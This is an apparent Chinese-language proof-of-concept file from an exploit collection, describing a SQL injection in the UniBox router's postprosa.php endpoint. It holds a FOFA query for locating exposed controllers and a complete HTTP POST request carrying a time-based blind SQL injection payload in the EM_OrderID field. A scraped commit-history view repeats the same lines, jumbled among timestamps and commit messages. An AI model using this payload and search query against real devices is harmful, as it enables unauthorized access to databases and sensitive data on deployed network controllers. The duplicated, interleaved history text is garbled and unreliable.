POC/wpoc/unibox路由器/unibox路由器postprosa接口存在SQL注入.md

# unibox路由器postprosa接口存在SQL注入

# 漏洞描述
UniBox 是一款一体化网络/热点控制器，可以部署为管理公共 WiFi 热点的热点网关，也可以部署为办公室和企业的网络控制器。unibox路由器postprosa存在SQL注入漏洞，攻击者可以根据该漏洞获取数据库权限，查看大量敏感信息。

# fofa
```
body="Unibox" && body="Controller"
```

## poc

```javascript
POST /api/postprosa.php HTTP/1.1
Host: 127.0.0.1:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q;
Connection: close

EM_OrderID=1'+AND+(SELECT+3676+FROM+(SELECT(SLEEP(5)))sdgB)+AND+'rBTA'%3d'rBTA
```
-												Update and rename unibox路由器postprosa存在SQL注入.md to unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:46:41 +08:00
+								# unibox路由器postprosa接口存在SQL注入
 								# 漏洞描述
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:48:45 +08:00
+								UniBox 是一款一体化网络/热点控制器，可以部署为管理公共 WiFi 热点的热点网关，也可以部署为办公室和企业的网络控制器。unibox路由器postprosa存在SQL注入漏洞，攻击者可以根据该漏洞获取数据库权限，查看大量敏感信息。
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:59:25 +08:00
 								# fofa
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 15:00:46 +08:00
+								```
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:59:25 +08:00
+								body="Unibox" && body="Controller"
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 15:00:46 +08:00
+								```
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:59:25 +08:00
-												Update and rename unibox路由器postprosa存在SQL注入.md to unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:46:41 +08:00
+								## poc
 								```javascript
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:47:01 +08:00
+								POST /api/postprosa.php HTTP/1.1
-												Update and rename unibox路由器postprosa存在SQL注入.md to unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:46:41 +08:00
+								Host: 127.0.0.1:8888
 								Accept-Encoding: gzip, deflate
 								Accept: */*
 								Accept-Language: en
 								User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
 								Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q;
 								Connection: close
-												Update unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:47:01 +08:00
 								EM_OrderID=1'+AND+(SELECT+3676+FROM+(SELECT(SLEEP(5)))sdgB)+AND+'rBTA'%3d'rBTA
-												Update and rename unibox路由器postprosa存在SQL注入.md to unibox路由器postprosa接口存在SQL注入.md
											
										
										
											2025-06-11 14:46:41 +08:00
+								```